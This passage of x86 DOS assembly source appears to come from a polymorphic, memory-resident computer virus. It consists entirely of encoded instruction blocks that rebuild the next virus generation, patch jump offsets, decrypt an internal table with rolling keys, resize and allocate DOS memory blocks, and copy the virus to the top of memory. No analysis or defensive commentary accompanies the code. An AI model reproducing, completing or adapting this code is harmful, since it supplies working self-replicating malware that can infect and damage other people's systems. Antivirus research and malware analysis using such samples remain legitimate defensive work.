instruction + + dec cx ; Decrease counter + + db 01110101b+10000000b ; Not zero? Jump to sto_ins_loo + dw 0beah ; Pointer to sto_ins_loo + db 02h ; Two bytes instruction + + mov bx,di ; BX = offset within next virus ge... + + db 01h ; One byte instruction + + pop di ; Load DI from stack + + db 11101001b ; JMP imm16 (opcode 0e9h) + dw 0bc1h ; Pointer to exam_bl_ + db 11101111b ; End of block +exam_data_ db 11101110b ; Beginning of block + dw 0bc4h ; Block identification of exam_data_ + db 02h ; Two bytes instruction + + cmp al,11101101b ; Data reference? + + db 01110101b+10000000b ; Not equal? Jump to exam_bl___ + dw 0bc5h ; Pointer to exam_bl___ + db 01h ; One byte instruction + + push di ; Load DI from stack + + db 05h ; Five bytes instruction + + mov di,es:[08h] ; DI = offset within data information + + db 02h ; Two bytes instruction + + mov ax,bx ; AX = offset within next virus ge... + + db 01h ; One byte instruction + + dec ax ; Decrease offset within next viru... + + db 01h ; One byte instruction + + dec ax ; Decrease offset within next viru... + + db 01h ; One byte instruction + + stosw ; Store offset within next virus g... + + db 11101000b ; CALL imm16 (opcode 0e8h) + dw 0be1h ; Pointer to decrypt_id_ + db 01h ; One byte instruction + + stosw ; Store block identification + + db 05h ; Five bytes instruction + + mov es:[08h],di ; Store offset within data informa... + + db 01h ; One byte instruction + + pop di ; Load DI from stack + + db 11101001b ; JMP imm16 (opcode 0e9h) + dw 0bc1h ; Pointer to exam_bl_ + db 11101111b ; End of block +exam_bl___ db 11101110b ; Beginning of block + dw 0bc5h ; Block identification of exam_bl___ + db 02h ; Two bytes instruction + + cmp al,11101110b ; Beginning of block? + + db 01110101b+10000000b ; Not equal? Jump to sto_call_jm_ + dw 0bc7h ; Pointer to sto_call_jm_ + db 01h ; One byte instruction + + push di ; Save DI at stack + + db 05h ; Five bytes instruction + + mov di,es:[04h] ; DI = offset within block informa... + + db 02h ; Two bytes instruction + + mov ax,bx ; AX = offset within next virus ge... + + db 01h ; One byte instruction + + stosw ; Store offset within next virus ge... + + db 11101000b ; CALL imm16 (opcode 0e8h) + dw 0be1h ; Pointer to decrypt_id_ + db 01h ; One byte instruction + + stosw ; Store block identification + + db 05h ; Five bytes instruction + + mov es:[04h],di ; Store offset within block inform... + + db 03h ; Three bytes instruction + + cmp ax,4c5h ; Block identification of tmc_table_? + + db 01110101b+10000000b ; Not equal? Jump to exam_messag + dw 0bc6h ; Pointer to exam_messag + db 01h ; One byte instruction + + push si ; Save SI at stack + + db 02h ; Two bytes instruction + + mov di,bx ; DI = offset within next virus ge... + + db 04h ; Four bytes instruction + + lea si,[bp+1234h] ; SI = offset of tmc_table_ + + db 11101101b ; Data reference + dw 4c5h ; Pointer to tmc_table_ + db 03h ; Three bytes instruction + + mov cx,(table_end-table_begin) + + db 02h ; Two bytes instruction + + rep movsb ; Move table to top of memory + + db 02h ; Two bytes instruction + + mov bx,di ; BX = offset within next virus ge... + + db 01h ; One byte instruction + + pop si ; Load SI from stack + + db 11101001b ; JMP imm16 (opcode 0e9h) + dw 0bebh ; Pointer to examine_nex + db 11101111b ; End of block +exam_messag db 11101110b ; Beginning of block + dw 0bc6h ; Block identification of exam_messag + db 03h ; Three bytes instruction + + cmp ax,2328h ; Block identification of message? + + db 01110101b+10000000b ; Not equal? Jump to exam_probab + dw 0bedh ; Pointer to exam_probab + db 03h ; Three bytes instruction + + mov ax,14h ; Probability of including message + + db 04h ; Four bytes instruction + + cmp [bp+1234h],ax ; Include message? + + db 11101101b ; Data reference + dw 0bech ; Pointer to probability_ + db 01110011b+10000000b ; Above or equal? Jump to examine_... + dw 0bebh ; Pointer to examine_nex + db 11101000b ; CALL imm16 (opcode 0e8h) + dw 0be0h ; Pointer to decrypt_byt + db 02h ; Two bytes instruction + + sub al,10h ; AL = length of message + + db 02h ; Two bytes instruction + + mov ah,00h ; Zero AH + + db 02h ; Two bytes instruction + + add si,ax ; SI = offset of end of message + + db 11101001b ; JMP imm16 (opcode 0e9h) + dw 0bebh ; Pointer to examine_nex + db 11101111b ; End of block +exam_probab db 11101110b ; Beginning of block + dw 0bedh ; Block identification of exam_probab + db 03h ; Three bytes instruction + + cmp ax,0bech ; Block identification of probabi...? + + db 01110101b+10000000b ; Not equal? Jump to examine_nex + dw 0bebh ; Pointer to examine_nex + db 04h ; Four bytes instruction + + mov ax,[bp+1234h] ; AX = probability_ + + db 11101101b ; Data reference + dw 0bech ; Pointer to probability_ + db 01h ; One byte instruction + + dec ax ; Decrease probability + + db 03h ; Three bytes instruction + + cmp ax,05h ; Probability too small? + + db 01110011b+10000000b ; Above or equal? Jump to store_pr... + dw 0bf5h ; Pointer to store_proba + db 03h ; Three bytes instruction + + mov ax,64h ; Reset probability + + db 11101001b ; JMP imm16 (opcode 0e9h) + dw 0bf5h ; Pointer to store_proba + db 11101111b ; End of block +store_proba db 11101110b ; Beginning of block + dw 0bf5h ; Block identification of store_proba + db 03h ; Three bytes instruction + + mov es:[bx],ax ; Store probability + + db 03h ; Three bytes instruction + + add bx,02h ; Add two to offset within next vi... + + db 03h ; Three bytes instruction + + add si,03h ; SI = offset of beginning of next... + + db 11101001b ; JMP imm16 (opcode 0e9h) + dw 0bebh ; Pointer to examine_nex + db 11101111b ; End of block +examine_nex db 11101110b ; Beginning of block + dw 0bebh ; Block identification of examine_nex + db 01h ; One byte instruction + + pop di ; Load DI from stack + + db 11101000b ; CALL imm16 (opcode 0e8h) + dw 0be0h ; Pointer to decrypt_byt + db 11101001b ; JMP imm16 (opcode 0e9h) + dw 0bc2h ; Pointer to exam_bl__ + db 11101111b ; End of block +sto_call_jm_ db 11101110b ; Beginning of block + dw 0bc7h ; Block identification of sto_call... + db 01h ; One byte instruction + + push ax ; Save AX at stack + + db 01h ; One byte instruction + + push di ; Save DI at stack + + db 05h ; Five bytes instruction + + mov di,es:[06h] ; DI = offset within CALL; JMP; Jc... + + db 02h ; Two bytes instruction + + mov ax,bx ; AX = offset within next virus ge... + + db 01h ; One byte instruction + + stosw ; Store offset within next virus g... + + db 11101000b ; CALL imm16 (opcode 0e8h) + dw 0be1h ; Pointer to decrypt_id_ + db 01h ; One byte instruction + + stosw ; Store block identification + + db 05h ; Five bytes instruction + + mov es:[06h],di ; Store offset within CALL; JMP; J... + + db 01h ; One byte instruction + + pop di ; Load DI from stack + + db 01h ; One byte instruction + + pop ax ; Load AX from stack + + db 03h ; Three bytes instruction + + mov es:[bx],al ; Store CALL imm16; JMP imm16; Jcc... + + db 03h ; Three bytes instruction + + add bx,03h ; Add three to offset within next ... + + db 02h ; Two bytes instruction + + cmp al,11110000b ; Jump condition? + + db 01110010b+10000000b ; Below? Jump to exam_bl_ + dw 0bc1h ; Pointer to exam_bl_ + db 01h ; One byte instruction + + inc bx ; Increase offset within next viru... + + db 01h ; One byte instruction + + inc bx ; Increase offset within next viru... + + db 11101001b ; JMP imm16 (opcode 0e9h) + dw 0bc1h ; Pointer to exam_bl_ + db 11101111b ; End of block +split_bloc_ db 11101110b ; Beginning of block + dw 0bc8h ; Block identification of split_bloc_ + db 04h ; Four bytes instruction + + mov es:[di+02h],bx ; Store offset within next virus g... + + db 03h ; Three bytes instruction + + add bx,03h ; Add three to offset within next ... + + db 11101001b ; JMP imm16 (opcode 0e9h) + dw 0bc9h ; Pointer to end_of_bloc + db 11101111b ; End of block +end_of_bloc db 11101110b ; Beginning of block + dw 0bc9h ; Block identification of end_of_bloc + db 01h ; One byte instruction + + dec si ; Decrease offset of block within ... + + db 03h ; Three bytes instruction + + mov es:[di],si ; Store offset of block within table + + db 11101001b ; JMP imm16 (opcode 0e9h) + dw 0bbdh ; Pointer to of split_bloc + db 11101111b ; End of block +exam_tbl_in db 11101110b ; Beginning of block + dw 0bcah ; Block identification of exam_tbl_in + db 06h ; Six bytes instruction + + cmp word ptr es:[0ch],00h + + db 01110101b+10000000b ; End of second table? Jump to cor... + dw 0fa1h ; Pointer to correc_i16 + db 01h ; One byte instruction + + pop si ; Load SI from stack + + db 05h ; Five bytes instruction + + mov es:[0ch],bx ; Store offset within next virus g... + + db 04h ; Four bytes instruction + + add si,(second_table-first_table) + + db 11101001b ; JMP imm16 (opcode 0e9h) + dw 0fa0h ; Pointer to initial_tmc + db 11101111b ; End of block +correc_i16 db 11101110b ; Beginning of block + dw 0fa1h ; Block identification of correc_i16 + db 01h ; One byte instruction + + push es ; Save ES at stack + + db 01h ; One byte instruction + + pop ds ; Load DS from stack (ES) + + db 04h ; Four bytes instruction + + sub bx,730h ; Subtract offset of next virus ge... + + db 04h ; Four bytes instruction + + mov ds:[0eh],bx ; Store length of virus + + db 03h ; Three bytes instruction + + mov si,2c8h ; SI = offset of CALL; JMP; Jcc im... + + db 04h ; Four bytes instruction + + mov cx,ds:[06h] ; CX = offset of end of CALL; JMP;... + + db 02h ; Two bytes instruction + + sub cx,si ; Subtract offset of CALL; JMP; Jc... + + db 02h ; Two bytes instruction + + shr cx,01h ; Divide number of CALL imm16; JMP... + + db 02h ; Two bytes instruction + + shr cx,01h ; Divide number of CALL imm16; JMP... + + db 11101001b ; JMP imm16 (opcode 0e9h) + dw 0bcbh ; Pointer to jmp_call_lo + db 11101111b ; End of block +jmp_call_lo db 11101110b ; Beginning of block + dw 0bcbh ; Block identification of jmp_call_lo + db 01h ; One byte instruction + + lodsw ; AX = offset of block within data... + + db 01h ; One byte instruction + + push ax ; Save AX at stack + + db 01h ; One byte instruction + + lodsw ; AX = offset of block within data... + + db 01h ; One byte instruction + + push cx ; Save CX at stack + + db 01h ; One byte instruction + + push si ; Save SI at stack + + db 03h ; Three bytes instruction + + mov si,118h ; SI = offset of block information + + db 04h ; Four bytes instruction + + mov cx,ds:[04h] ; CX = offset of end of block info... + + db 02h ; Two bytes instruction + + sub cx,si ; Subtract offset of block informa... + + db 02h ; Two bytes instruction + + shr cx,01h ; Divide number of block by two + + db 02h ; Two bytes instruction + + shr cx,01h ; Divide number of block by two + + db 11101001b ; JMP imm16 (opcode 0e9h) + dw 0bcch ; Pointer to find_block__ + db 11101111b ; End of block +find_block__ db 11101110b ; Beginning of block + dw 0bcch ; Block identification of find_blo... + db 03h ; Three bytes instruction + + cmp ax,[si+02h] ; Found block? + + db 01110100b+10000000b ; Equal? Jump to found_bloc + dw 0bcdh ; Pointer to found_bloc + db 03h ; Three bytes instruction + + add si,04h ; SI = offset of next block in table + + db 01h ; One byte instruction + + dec cx ; Decrease counter + + db 01110101b+10000000b ; Not zero? Jump to find_block__ + dw 0bcch ; Pointer to find_block__ + db 11101111b ; End of block +found_bloc db 11101110b ; Beginning of block + dw 0bcdh ; Block identification of found_bloc + db 02h ; Two bytes instruction + + mov dx,[si] ; DX = offset of block + + db 01h ; One byte instruction + + pop si ; Load SI from stack + + db 01h ; One byte instruction + + pop cx ; Load CX from stack + + db 01h ; One byte instruction + + pop bx ; Load BX from stack (AX) + + db 02h ; Two bytes instruction + + mov al,[bx] ; AL = first byte of instruction + + db 02h ; Two bytes instruction + + cmp al,11110000b ; Jump condition? + + db 01110010b+10000000b ; Below? Jump to sto_call_j + dw 0bcfh ; Pointer to sto_call_j + db 03h ; Three bytes instruction + + sub byte ptr [bx],10000000b + + db 01h ; One byte instruction + + inc bx ; BX = offset of 8-bit immediate + + db 01h ; One byte instruction + + push dx ; Save DX at stack + + db 02h ; Two bytes instruction + + sub dx,bx ; Subtract offset within next viru... + + db 01h ; One byte instruction + + dec dx ; Decrease 8-bit immediate + + db 03h ; Three bytes instruction + + cmp dx,7fh ; 8-bit immediate out of range? + + db 01111111b+10000000b ; Greater? Jump to invert_jcc_ + dw 0bceh ; Pointer to invert_jcc_ + db 03h ; Three bytes instruction + + cmp dx,0ff80h ; 8-bit immediate out of range? + + db 01111100b+10000000b ; Less? Jump to invert_jcc_ + dw 0bceh ; Pointer to invert_jcc_ + db 02h ; Two bytes instruction + + mov [bx],dl ; Store 8-bit immediate + + db 01h ; One byte instruction + + inc bx ; BX = offset of end of Jcc imm8 + + db 04h ; Four bytes instruction + + mov [bx],1001000010010000b + + db 04h ; Four bytes instruction + + mov byte ptr [bx+02h],10010000b + + db 01h ; One byte instruction + + pop dx ; Load DX from stack + + db 11101001b ; JMP imm16 (opcode 0e9h) + dw 0bd0h ; Pointer to correc_i16_ + db 11101111b ; End of block +invert_jcc_ db 11101110b ; Beginning of block + dw 0bceh ; Block identification of invert_jcc_ + db 01h ; One byte instruction + + pop dx ; Load DX from stack + + db 01h ; One byte instruction + + dec bx ; BX = offset of Jcc imm8 + + db 03h ; Three bytes instruction + + xor byte ptr [bx],00000001b + + db 01h ; One byte instruction + + inc bx ; BX = offset of 8-bit immediate + + db 03h ; Three bytes instruction + + mov byte ptr [bx],03h ; Store 8-bit immediate + + db 01h ; One byte instruction + + inc bx ; BX = offset of JMP imm16 + + db 02h ; Two bytes instruction + + mov al,11101001b ; JMP imm16 (opcode 0e9h) + + db 11101001b ; JMP imm16 (opcode 0e9h) + dw 0bcfh ; Pointer to sto_call_j + db 11101111b ; End of block +sto_call_j db 11101110b ; Beginning of block + dw 0bcfh ; Block identification of sto_call_j + db 02h ; Two bytes instruction + + mov [bx],al ; Store CALL imm16; JMP imm16 + + db 01h ; One byte instruction + + inc bx ; BX = offset of 16-bit immediate + + db 02h ; Two bytes instruction + + sub dx,bx ; Subtract offset within next viru... + + db 01h ; One byte instruction + + dec dx ; Decrease 16-bit immediate + + db 01h ; One byte instruction + + dec dx ; Decrease 16-bit immediate + + db 02h ; Two bytes instruction + + mov [bx],dx ; Store 16-bit immediate + + db 11101001b ; JMP imm16 (opcode 0e9h) + dw 0bd0h ; Pointer to correc_i16_ + db 11101111b ; End of block +correc_i16_ db 11101110b ; Beginning of block + dw 0bd0h ; Block identification of correc_16_ + db 01h ; One byte instruction + + dec cx ; Decrease counter + + db 01110101b+10000000b ; Not zero? Jump to jmp_call_lo + dw 0bcbh ; Pointer to jmp_call_lo + db 03h ; Three bytes instruction + + mov si,5a8h ; SI = offset of data information + + db 04h ; Four bytes instruction + + mov cx,ds:[08h] ; CX = offset of end of data infor... + + db 02h ; Two bytes instruction + + sub cx,si ; Subtract offset of data informat... + + db 02h ; Two bytes instruction + + shr cx,01h ; Divide number of data references... + + db 02h ; Two bytes instruction + + shr cx,01h ; Divide number of data references... + + db 11101001b ; JMP imm16 (opcode 0e9h) + dw 0bd1h ; Pointer to data_ref_lo + db 11101111b ; End of block +data_ref_lo db 11101110b ; Beginning of block + dw 0bd1h ; Block identification of data_ref_lo + db 01h ; One byte instruction + + lodsw ; AX = offset of block within data... + + db 01h ; One byte instruction + + push ax ; Save AX at stack + + db 01h ; One byte instruction + + lodsw ; AX = offset of block within data... + + db 01h ; One byte instruction + + push cx ; Save CX at stack + + db 01h ; One byte instruction + + push si ; Save SI at stack + + db 03h ; Three bytes instruction + + mov si,118h ; SI = offset of block information + + db 04h ; Four bytes instruction + + mov cx,ds:[04h] ; CX = offset of end of block info... + + db 02h ; Two bytes instruction + + sub cx,si ; Subtract offset of block informa... + + db 02h ; Two bytes instruction + + shr cx,01h ; Divide number of block by two + + db 02h ; Two bytes instruction + + shr cx,01h ; Divide number of block by two + + db 11101001b ; JMP imm16 (opcode 0e9h) + dw 0bd2h ; Pointer to find_bloc + db 11101111b ; End of block +find_bloc db 11101110b ; Beginning of block + dw 0bd2h ; Block identification to find_bloc + db 03h ; Three bytes instruction + + cmp ax,[si+02h] ; Found block? + + db 01110100b+10000000b ; Equal? Jump to found_bloc_ + dw 0bd3h ; Pointer to found_bloc_ + db 03h ; Three bytes instruction + + add si,04h ; SI = offset of next block in table + + db 01h ; One byte instruction + + dec cx ; Decrease counter + + db 01110101b+10000000b ; Not zero? Jump to find_bloc + dw 0bd2h ; Pointer to find_bloc + db 11101111b ; End of block +found_bloc_ db 11101110b ; Beginning of block + dw 0bd3h ; Block identification of found_bloc_ + db 02h ; Two bytes instruction + + mov ax,[si] ; AX = offset of block + + db 01h ; One byte instruction + + pop si ; Load SI from stack + + db 01h ; One byte instruction + + pop cx ; Load CX from stack + + db 01h ; One byte instruction + + pop bx ; Load BX from stack (AX) + + db 03h ; Three bytes instruction + + sub ax,730h ; Subtract offset of next virus ge... + + db 02h ; Two bytes instruction + + mov [bx],ax ; Store 16-bit immediate + + db 01h ; One byte instruction + + dec cx ; Decrease counter + + db 01110101b+10000000b ; Not zero? Jump to data_ref_lo + dw 0bd1h ; Pointer to data_ref_lo + db 11101001b ; JMP imm16 (opcode 0e9h) + dw 1772h ; Pointer to restore_cod + db 11101111b ; End of block +restore_cod db 11101110b ; Beginning of block + dw 1772h ; Block identification of restore_cod + db 04h ; Four bytes instruction + + mov ax,[bp+1234h] ; AX = segment of PSP for current ... + + db 11101101b ; Data reference + dw 0befh ; Pointer to program_seg_ + db 04h ; Four bytes instruction + + mov cx,[bp+1234h] ; CX = initial SS relative to star... + + db 11101101b ; Data reference + dw 138ah ; Pointer to initial_ss_ + db 03h ; Three bytes instruction + + add cx,10h ; Add ten to initial SS relative t... + + db 02h ; Two bytes instruction + + add cx,ax ; Add segment of PSP for current p... + + db 01h ; One byte instruction + + push cx ; Save CX at stack + + db 04h ; Four bytes instruction + + push [bp+1234h] ; Save initial SP at stack + + db 11101101b ; Data reference + dw 138ch ; Pointer to initial_sp_ + db 04h ; Four bytes instruction + + mov cx,[bp+1234h] ; CX = initial CS relative to star... + + db 11101101b ; Data reference + dw 1389h ; Pointer to initial_cs_ + db 03h ; Three bytes instruction + + add cx,10h ; Add ten to initial CS relative t... + + db 02h ; Two bytes instruction + + add cx,ax ; Add segment of PSP for current p... + + db 01h ; One byte instruction + + push cx ; Save CX at stack + + db 04h ; Four bytes instruction + + push [bp+1234h] ; Save initial IP at stack + + db 11101101b ; Data reference + dw 138bh ; Pointer to initial_ip_ + db 01h ; One byte instruction + + push ax ; Save segment of PSP for current ... + + db 04h ; Four bytes instruction + + push [bp+1234h] ; Save size of memory block in par... + + db 11101101b ; Data reference + dw 1395h ; Pointer to mcb_size__ + db 01h ; One byte instruction + + push ds ; Save DS at stack + + db 02h ; Two bytes instruction + + mov cl,00h ; COM executable + + db 04h ; Four bytes instruction + + cmp [bp+1234h],cl ; COM executable? + + db 11101101b ; Data reference + dw 1388h ; Pointer to executa_sta + db 01110101b+10000000b ; Not equal? Jump to move_virus__ + dw 1390h ; Pointer to move_virus__ + db 04h ; Four bytes instruction + + lea si,[bp+1234h] ; SI = offset of origin_code_ + + db 11101101b ; Data reference + dw 1f40h ; Pointer to origin_code_ + db 03h ; Three bytes instruction + + mov ax,cs:[si] ; AX = first two bytes of original... + + db 04h ; Four bytes instruction + + mov cs:[100h],ax ; Store first two bytes of origina... + + db 04h ; Four bytes instruction + + mov al,cs:[si+02h] ; AL = last byte of original code ... + + db 04h ; Four bytes instruction + + mov cs:[100h+02h],al ; Store last byte of original code... + + db 11101001b ; JMP imm16 (opcode 0e9h) + dw 1390h ; Pointer to move_virus__ + db 11101111b ; End of block + db 11101110b ; Beginning of block + dw 1774h + db 04h ; Four bytes instruction + + mov ax,[bp+1234h] ; AX = segment of PSP for current ... + + db 11101101b ; Data reference + dw 0befh ; Pointer to program_seg_ + db 04h ; Four bytes instruction + + mov cx,[bp+1234h] ; CX = initial SS relative to star... + + db 11101101b ; Data reference + dw 138ah ; Pointer to initial_ss_ + db 03h ; Three bytes instruction + + add cx,10h ; Add ten to initial SS relative t... + + db 02h ; Two bytes instruction + + add cx,ax ; Add segment of PSP for current p... + + db 01h ; One byte instruction + + push cx ; Save CX at stack + + db 04h ; Four bytes instruction + + push [bp+1234h] ; Save initial SP at stack + + db 11101101b ; Data reference + dw 138ch ; Pointer to initial_sp_ + db 04h ; Four bytes instruction + + mov cx,[bp+1234h] ; CX = initial CS relative to star... + + db 11101101b ; Data reference + dw 1389h ; Pointer to initial_cs_ + db 03h ; Three bytes instruction + + add cx,10h ; Add ten to initial CS relative t... + + db 02h ; Two bytes instruction + + add cx,ax ; Add segment of PSP for current p... + + db 01h ; One byte instruction + + push cx ; Save CX at stack + + db 04h ; Four bytes instruction + + push [bp+1234h] ; Save incorrect IP at stack + + db 11101101b ; Data reference + dw 1773h ; Pointer to incorrec_ip + db 01h ; One byte instruction + + push ax ; Save segment of PSP for current ... + + db 04h ; Four bytes instruction + + push [bp+1234h] ; Save size of memory block in par... + + db 11101101b ; Data reference + dw 1395h ; Pointer to mcb_size__ + db 01h ; One byte instruction + + push ds ; Save DS at stack + + db 02h ; Two bytes instruction + + mov cl,00h ; COM executable + + db 04h ; Four bytes instruction + + cmp [bp+1234h],cl ; COM executable? + + db 11101101b ; Data reference + dw 1388h ; Pointer to executa_sta + db 01110101b+10000000b ; Not equal? Jump to move_virus__ + dw 1390h ; Pointer to move_virus__ + db 04h ; Four bytes instruction + + lea si,[bp+1234h] ; SI = offset of incorr_code_ + + db 11101101b ; Data reference + dw 1776h ; Pointer to incorr_code_ + db 03h ; Three bytes instruction + + mov ax,cs:[si] ; AX = first two bytes of incorrec... + + db 04h ; Four bytes instruction + + mov cs:[100h],ax ; Store first two bytes of incorre... + + db 04h ; Four bytes instruction + + mov al,cs:[si+02h] ; AL = last byte of incorrect code + + db 04h ; Four bytes instruction + + mov cs:[100h+02h],al ; Store last byte of incorrect code + + db 11101001b ; JMP imm16 (opcode 0e9h) + dw 1390h ; Pointer to move_virus__ + db 11101111b ; End of block +move_virus__ db 11101110b ; Beginning of block + dw 1390h ; Block identification of move_vir... + db 02h ; Two bytes instruction + + xor ax,ax ; Zero AX + + db 02h ; Two bytes instruction + + mov ds,ax ; DS = segment of DOS communicatio... + + db 05h ; Five bytes instruction + + cmp byte ptr ds:[501h],10h + + db 01110100b+10000000b ; Already resident? Jump to virus_... + dw 65h ; Pointer to virus_exit_ + db 05h ; Five bytes instruction + + mov byte ptr ds:[501h],10h + + db 01h ; One byte instruction + + push es ; Save ES at stack + + db 01h ; One byte instruction + + pop ds ; Load DS from stack (ES) + + db 03h ; Three bytes instruction + + mov ax,ds:[0ch] ; AX = offset within next virus ge... + + db 03h ; Three bytes instruction + + sub ax,730h ; Subtract offset of next virus ge... + + db 04h ; Four bytes instruction + + mov [bp+1234h],ax ; Store offset of virus_exit + + db 11101101b ; Data reference + dw 0bf1h ; Pointer to vir_exit_of + db 04h ; Four bytes instruction + + mov cx,ds:[0eh] ; CX = length of virus + + db 04h ; Four bytes instruction + + mov [bp+1234h],cx ; Store length of virus + + db 11101101b ; Data reference + dw 0bf0h ; Pointer to virus_lengt + db 03h ; Three bytes instruction + + mov si,730h ; SI = offset of next virus genera... + + db 02h ; Two bytes instruction + + xor di,di ; Zero DI + + db 02h ; Two bytes instruction + + rep movsb ; Move virus to top of memory + + db 02h ; Two bytes instruction + + mov cl,04h ; Divide by paragraphs + + db 02h ; Two bytes instruction + + shr di,cl ; DI = length of next virus genera... + + db 01h ; One byte instruction + + inc di ; Increase length of next virus ge... + + db 04h ; Four bytes instruction + + mov bx,[bp+1234h] ; BX = size of memory block in par... + + db 11101101b ; Data reference + dw 1394h ; Pointer to mcb_size___ + db 04h ; Four bytes instruction + + sub bx,[bp+1234h] ; Subtract new size in paragraphs ... + + db 11101101b ; Data reference + dw 1393h ; Pointer to new_mcb_siz + db 02h ; Two bytes instruction + + sub bx,di ; Subtract length of next virus ge... + + db 01h ; One byte instruction + + dec bx ; Decrease new size in paragraphs + + db 01h ; One byte instruction + + dec bx ; Decrease new size in paragraphs + + db 02h ; Two bytes instruction + + cmp bx,di ; Insufficient memory? + + db 01110010b+10000000b ; Below? Jump to virus_exit_ + dw 65h ; Pointer to virus_exit_ + db 02h ; Two bytes instruction + + mov ah,4ah ; Resize memory block + + db 02h ; Two bytes instruction + + int 21h + + db 01110010b+10000000b ; Error? Jump to virus_exit_ + dw 65h ; Pointer to virus_exit_ + db 02h ; Two bytes instruction + + mov bx,di ; BX = number of paragraphs to all... + + db 02h ; Two bytes instruction + + mov ah,48h ; Allocate memory + + db 02h ; Two bytes instruction + + int 21h + + db 01110010b+10000000b ; Error? Jump to virus_exit_ + dw 65h ; Pointer to virus_exit_ + db 01h ; One byte instruction + + dec ax ; AX = segment of current Memory C... + + db 02h ; Two bytes instruction + + mov es,ax ; ES = segment of current Memory C... + + db 07h ; Seven bytes instruction + + mov word ptr es:[01h],08h + + db 01h ; One byte instruction + + inc ax ; AX = segment of PSP for current ... + + db 02h ; Two bytes instruction + + mov es,ax ; AX = segment of PSP for current ... + + db 04h ; Four bytes instruction + + mov cx,[bp+1234h] ; CX = length of virus + + db 11101101b ; Data reference + dw 0bf0h ; Pointer to virus_lengt + db 02h ; Two bytes instruction + + xor si,si ; Zero SI + + db 02h ; Two bytes instruction + + xor di,di ; Zero DI + + db 02h ; Two bytes instruction + + rep movsb ; Move virus to top of memory + + db 01h ; One byte instruction + + push es ; Save ES at stack + + db 04h ; Four bytes instruction + + push [bp+1234h] ; Save offset of virus_exit_ at stack + + db 11101101b ; Data reference + dw 0bf1h ; Pointer to vir_exit_of + db 04h ; Four bytes instruction + + mov al,[bp+1234h] ; AL = 8-bit encryption/decryption... + + db 11101101b ; Data reference + dw 0bd7h ; Pointer to crypt_key_ + db 04h ; Four bytes instruction + + mov ah,[bp+1234h] ; AH = 8-bit sliding encryption/de... + + db 11101101b ; Data reference + dw 0bd8h ; Pointer to sliding_key_ + db 01h ; One byte instruction + + retf ; Return far + + db 11101111b ; End of block +terminate_ db 11101110b ; Beginning of block + dw 0beeh ; Block identification of terminate_ + db 03h ; Three bytes instruction + + mov ax,4c00h ; Terminate with return code + + db 02h ; Two bytes instruction + + int 21h + + db 11101111b ; End of block +get_rnd_num_ db 11101110b ; Beginning of block + dw 0bd4h ; Block identification of get_rnd_... + db 01h ; One byte instruction + + push cx ; Save CX at stack + + db 02h ; Two bytes instruction + + in al,40h ; AL = 8-bit random number + + db 02h ; Two bytes instruction + + mov ah,al ; AH = 8-bit random number + + db 02h ; Two bytes instruction + + in al,40h ; AL = 8-bit random number + + db 05h ; Five bytes instruction + + xor ax,es:[02h] ; AX = 16-bit random number + + db 02h ; Two bytes instruction + + mov cl,ah ; CL = high-order byte of 16-bit r... + + db 02h ; Two bytes instruction + + rol ax,cl ; AX = 16-bit random number + + db 04h ; Four bytes instruction + + mov es:[02h],ax ; Store 16-bit random number + + db 01h ; One byte instruction + + pop cx ; Load CX from stack + + db 01h ; One byte instruction + + ret ; Return + + db 11101111b ; End of block +rnd_in_rang db 11101110b ; Beginning of block + dw 0bd5h ; Block identification of rnd_in_rang + db 02h ; Two bytes instruction + + or bp,bp ; Zero BP? + + db 01110100b+10000000b ; Zero? Jump to zero_range_ + dw 0bd6h ; Pointer to zero_range_ + db 01h ; One byte instruction + + push dx ; Save DX at stack + + db 11101000b ; CALL imm16 (opcode 0e8h) + dw 0bd4h ; Pointer to get_rnd_num_ + db 02h ; Two bytes instruction + + xor dx,dx ; Zero DX + + db 02h ; Two bytes instruction + + div bp ; DX = random number within range + + db 01h ; One byte instruction + + xchg ax,dx ; AX = random number within range + + db 01h ; One byte instruction + + pop dx ; Load DX from stack + + db 01h ; One byte instruction + + ret ; Return + + db 11101111b ; End of block +zero_range_ db 11101110b ; Beginning of block + dw 0bd6h ; Block identification of zero_range_ + db 02h ; Two bytes instruction + + xor ax,ax ; AX = random number within range + + db 01h ; One byte instruction + + ret ; Return + + db 11101111b ; End of block +decrypt_byt db 11101110b ; Beginning of block + dw 0be0h ; Block identification of decrypt_byt + db 04h ; Four bytes instruction + + mov [bp+1234h],ah ; Store AH + + db 11101101b ; Data reference + dw 0bd9h ; Pointer to ah__ + db 02h ; Two bytes instruction + + mov ax,si ; AX = offset within table + + db 02h ; Two bytes instruction + + sub ax,bp ; Subtract delta offset from offse... + + db 03h ; Three bytes instruction + + sub ax,1234h ; Subtract offset of tmc_table_ fr... + + db 11101101b ; Data reference + dw 4c5h ; Pointer to tmc_table_ + db 04h ; Four bytes instruction + + mul word ptr [bp+1234h] ; AL = 8-bit sliding encryption/de... + + db 11101101b ; Data reference + dw 0bd8h ; Pointer to sliding_key_ + db 04h ; Four bytes instruction + + add al,[bp+1234h] ; AL = 8-bit encryption/decryption... + + db 11101101b ; Data reference + dw 0bd7h ; Pointer to crypt_key_ + db 02h ; Two bytes instruction + + xor al,[si] ; AL = byte of decrypted table + + db 04h ; Four bytes instruction + + mov ah,[bp+1234h] ; AH = stored AH + + db 11101101b ; Data reference + dw 0bd9h ; Pointer to ah__ + db 01h ; One byte instruction + + inc si ; Increase offset within table + + db 01h ; One byte instruction + + ret ; Return + + db 11101111b ; End of block +decrypt_id_ db 11101110b ; Beginning of block + dw 0be1h ; Block identification of decrypt_id_ + db 11101000b ; CALL imm16 (opcode 0e8h) + dw 0be0h ; Pointer to decrypt_byt + db 02h ; Two bytes instruction + + mov ah,al ; AL = byte of decrypted table + + db 11101000b ; CALL imm16 (opcode 0e8h) + dw 0be0h ; Pointer to decrypt_byt + db 02h ; Two bytes instruction + + xchg al,ah ; AL = byte of decrypted table + + db 01h ; One byte instruction + + ret ; Return + + db 11101111b ; End of block +virus_exit_ db 11101110b ; Beginning of block + dw 65h ; Block identification of virus_exit_ + db 01h ; One byte instruction + + pop es ; Load ES from stack + + db 02h ; Two bytes instruction + + mov ah,49h ; Free memory + + db 02h ; Two bytes instruction + + int 21h + + db 01h ; One byte instruction + + pop bx ; Load BX from stack + + db 01h ; One byte instruction + + pop ax ; Load AX from stack + + db 02h ; Two bytes instruction + + mov ds,ax ; DS = segment of PSP for current ... + + db 02h ; Two bytes instruction + + mov es,ax ; DS = segment of PSP for current ... + + db 02h ; Two bytes instruction + + mov ah,4ah ; Resize memory block + + db 02h ; Two bytes instruction + + int 21h + + db 04h ; Four bytes instruction + + lea bx,[bp+1234h] ; BX = offset of jmp_imm32_ + + db 11101101b ; Data reference 